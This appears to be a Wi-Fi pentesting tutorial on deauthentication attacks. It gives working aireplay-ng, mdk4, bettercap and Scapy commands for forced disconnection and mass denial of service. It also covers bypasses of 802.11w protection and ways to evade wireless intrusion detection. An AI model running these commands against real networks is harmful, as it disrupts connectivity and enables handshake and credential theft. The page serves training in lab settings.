Deauthentication Attacks
Deauthentication frames can disconnect clients from a network. This is used to capture handshakes, force clients to roam to an evil twin, or cause denial of service.
📑 Table of Contents
802.11w (Management Frame Protection)
Modern networks with MFP/PMF enabled encrypt management frames, making deauth attacks ineffective.
WPA3 mandates 802.11w — on these networks a deauth will be silently dropped. Check your target's
capabilities with
airodump-ng (look for MFPR or MFPC flags in output).
Deauth Fundamentals
802.11 deauthentication frames are unencrypted management frames (in networks without 802.11w). Any device can spoof a deauth from the AP's BSSID to disconnect clients. Use cases in pentesting:
- Handshake capture: Force WPA 4-way handshake by disconnecting a client
- Evil twin herding: Push clients from real AP to your rogue AP
- Hidden SSID reveal: Force client reassociation to expose SSID in probes
- Denial of service: Continuously deauth all clients from target AP
- PMKID capture: Force AP to re-send PMKID in first EAPOL frame
Aireplay-ng
Deauthenticate a single client.
bash
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0monsudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0monBroadcast deauth to all clients (continuous).
bash
sudo aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0monsudo aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0monMDK4 Advanced Deauth
MDK4 is more powerful than aireplay — it supports various deauth/disassociation modes and can target multiple BSSIDs simultaneously.
bash
# Target specific AP
echo "AA:BB:CC:DD:EE:FF" > target.txt
sudo mdk4 wlan0mon d -b target.txt
# Deauth with both deauth AND disassociation frames
sudo mdk4 wlan0mon d -b target.txt -c 6
# Mass deauth all visible networks (DESTRUCTIVE!)
sudo mdk4 wlan0mon d# Target specific AP
echo "AA:BB:CC:DD:EE:FF" > target.txt
sudo mdk4 wlan0mon d -b target.txt
# Deauth with both deauth AND disassociation frames
sudo mdk4 wlan0mon d -b target.txt -c 6
# Mass deauth all visible networks (DESTRUCTIVE!)
sudo mdk4 wlan0mon dBettercap
Deauth using Bettercap's integrated WiFi module.
bash
sudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.deauth AA:BB:CC:DD:EE:FFsudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.deauth AA:BB:CC:DD:EE:FF802.11w (MFP) Interaction
802.11w (Management Frame Protection / PMF) is the primary defense against deauthentication attacks. Understanding whether MFP is enabled determines which attack techniques will work.
Detecting MFP Status
bash
# Check MFP status in airodump-ng output
# Look at the columns after AUTH:
# MFPC = Management Frame Protection Capable (optional)
# MFPR = Management Frame Protection Required (mandatory)
sudo airodump-ng wlan0mon
# Detailed check with iw
sudo iw dev wlan0mon scan | grep -A 15 "CorpWiFi" | grep -i "pmf|mfp|capabilities"
# Wireshark filter — check RSN capabilities field
# Bit 6 = MFPC (capable), Bit 7 = MFPR (required)
tshark -i wlan0mon -Y "wlan.fc.type_subtype == 0x08" \
-T fields -e wlan.ssid -e wlan.rsn.capabilities.mfpc -e wlan.rsn.capabilities.mfpr# Check MFP status in airodump-ng output
# Look at the columns after AUTH:
# MFPC = Management Frame Protection Capable (optional)
# MFPR = Management Frame Protection Required (mandatory)
sudo airodump-ng wlan0mon
# Detailed check with iw
sudo iw dev wlan0mon scan | grep -A 15 "CorpWiFi" | grep -i "pmf|mfp|capabilities"
# Wireshark filter — check RSN capabilities field
# Bit 6 = MFPC (capable), Bit 7 = MFPR (required)
tshark -i wlan0mon -Y "wlan.fc.type_subtype == 0x08" \
-T fields -e wlan.ssid -e wlan.rsn.capabilities.mfpc -e wlan.rsn.capabilities.mfprMFP Status Impact on Attacks
| MFP Setting | Deauth Works? | Alternative Attack |
|---|---|---|
| Disabled | Yes — fully effective | Standard deauth with any tool |
| Optional (MFPC) | Depends on client | Works on clients that didn't negotiate MFP |
| Required (MFPR) | No — silently dropped | CSA, beacon flood, TKIP countermeasures, channel DoS |
Bypasses When MFP Is Required
bash
# Bypass 1: Channel Switch Announcement (CSA) injection
# Spoof CSA beacons from the AP, telling clients to move to a different channel
# Clients obey CSA even with MFP — it's processed before authentication
sudo mdk4 wlan0mon d -b target.txt -c 6 -w 1
# Bypass 2: Rogue AP on same SSID without MFP
# If AP uses MFPC (optional), create a twin without MFP
# Clients that connect to your AP won't have MFP protection
# Then deauth them from your own AP freely
# Bypass 3: Auth flood (exhaust AP association table)
# Flood the AP with fake authentication requests
# When association table is full, legitimate clients can't re-associate
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF
# Bypass 4: Beacon flood to confuse clients
# Create hundreds of fake APs on the same channel
# Overwhelms client network selection
sudo mdk4 wlan0mon b -f ssid-list.txt -c 6# Bypass 1: Channel Switch Announcement (CSA) injection
# Spoof CSA beacons from the AP, telling clients to move to a different channel
# Clients obey CSA even with MFP — it's processed before authentication
sudo mdk4 wlan0mon d -b target.txt -c 6 -w 1
# Bypass 2: Rogue AP on same SSID without MFP
# If AP uses MFPC (optional), create a twin without MFP
# Clients that connect to your AP won't have MFP protection
# Then deauth them from your own AP freely
# Bypass 3: Auth flood (exhaust AP association table)
# Flood the AP with fake authentication requests
# When association table is full, legitimate clients can't re-associate
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF
# Bypass 4: Beacon flood to confuse clients
# Create hundreds of fake APs on the same channel
# Overwhelms client network selection
sudo mdk4 wlan0mon b -f ssid-list.txt -c 6Detection Evasion
Enterprise WLANs often deploy Wireless Intrusion Detection Systems (WIDS) that alert on deauthentication floods. These techniques reduce detection probability.
WIDS Detection Thresholds
Most WIDS solutions (Cisco CleanAir, Aruba WIDS, Meraki Air Marshal) trigger on deauth frame rates
exceeding ~10–20 per second per BSSID. Staying below this threshold avoids most automated alerts.
Low-and-Slow Deauthentication
bash
# Technique 1: Rate-limited deauth (1 burst every 30 seconds)
# Only need a single deauth to trigger handshake re-capture
for i in $(seq 1 5); do
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
sleep 30
done
# Technique 2: Target only high-value clients
# Instead of broadcast deauth, target specific client MACs
# identified during recon — this generates far fewer frames
sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# Technique 3: Disassociation instead of deauthentication
# Some WIDS don't alert on disassociation (reason code 8)
# aireplay reason codes: -0 = deauth, reason code 7
sudo mdk4 wlan0mon d -b target.txt -s 1 # -s = speed limiting# Technique 1: Rate-limited deauth (1 burst every 30 seconds)
# Only need a single deauth to trigger handshake re-capture
for i in $(seq 1 5); do
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
sleep 30
done
# Technique 2: Target only high-value clients
# Instead of broadcast deauth, target specific client MACs
# identified during recon — this generates far fewer frames
sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# Technique 3: Disassociation instead of deauthentication
# Some WIDS don't alert on disassociation (reason code 8)
# aireplay reason codes: -0 = deauth, reason code 7
sudo mdk4 wlan0mon d -b target.txt -s 1 # -s = speed limitingReason Code Manipulation
Deauth frames contain a reason code that tells the client why it was disconnected. Some look more legitimate than others. WIDS and analysts examine these.
| Code | Meaning | Stealth Level | Notes |
|---|---|---|---|
| 1 | Unspecified | Low | Obvious attack indicator |
| 3 | STA leaving | High | Looks like normal client disconnect |
| 4 | Inactivity | High | Mimics AP idle timeout |
| 5 | AP busy | Medium | Plausible during congestion |
| 7 | Class 3 from non-assoc | Low | Default aireplay-ng — most flagged |
| 8 | STA leaving BSS | High | Disassociation — less monitored |
python
# Scapy — craft deauths with custom reason codes
python3 << 'EOF'
from scapy.all import *
# Reason code 3 = "Deauthenticated because sending STA is leaving"
# Looks like a natural client disconnect from the AP's perspective
ap_mac = "AA:BB:CC:DD:EE:FF"
client_mac = "CC:DD:EE:FF:00:11"
iface = "wlan0mon"
# Craft deauth from AP to client (reason 3)
pkt = RadioTap() / Dot11(
addr1=client_mac, # destination
addr2=ap_mac, # source (spoofed AP)
addr3=ap_mac # BSSID
) / Dot11Deauth(reason=3)
# Send with random inter-packet delay (evasion)
sendp(pkt, iface=iface, count=3, inter=0.5)
EOF# Scapy — craft deauths with custom reason codes
python3 << 'EOF'
from scapy.all import *
# Reason code 3 = "Deauthenticated because sending STA is leaving"
# Looks like a natural client disconnect from the AP's perspective
ap_mac = "AA:BB:CC:DD:EE:FF"
client_mac = "CC:DD:EE:FF:00:11"
iface = "wlan0mon"
# Craft deauth from AP to client (reason 3)
pkt = RadioTap() / Dot11(
addr1=client_mac, # destination
addr2=ap_mac, # source (spoofed AP)
addr3=ap_mac # BSSID
) / Dot11Deauth(reason=3)
# Send with random inter-packet delay (evasion)
sendp(pkt, iface=iface, count=3, inter=0.5)
EOFTargeted Deauth Strategy
Effective deauthentication requires a tactical approach rather than blind flooding. Match the technique to your objective for best results and lowest detection risk.
| Objective | Technique | Frames Needed | WIDS Risk |
|---|---|---|---|
| WPA handshake capture | Single client, 2–5 frames | 2–5 | Minimal |
| Evil twin herding | Sustained targeted, 10 sec bursts | 50–100 | Medium |
| Hidden SSID reveal | Single client, 1–3 frames | 1–3 | Minimal |
| DoS demonstration | Broadcast, continuous | ∞ | Very High |
| PMKID capture | AP-only (hcxdumptool) | 0 (passive) | None |
🎯
Deauthentication Attack Practice
Practice deauth attacks, handshake capture, and MFP testing in isolated lab environments.
🔧
Deauth & Handshake Lab Custom Lab medium
aireplay-ng deauthhandshake captureScapy frame crafting
🏠
Open Lab
WiFi Hacking 101 TryHackMe easy
deauth attacks802.11w MFP testingWireshark analysis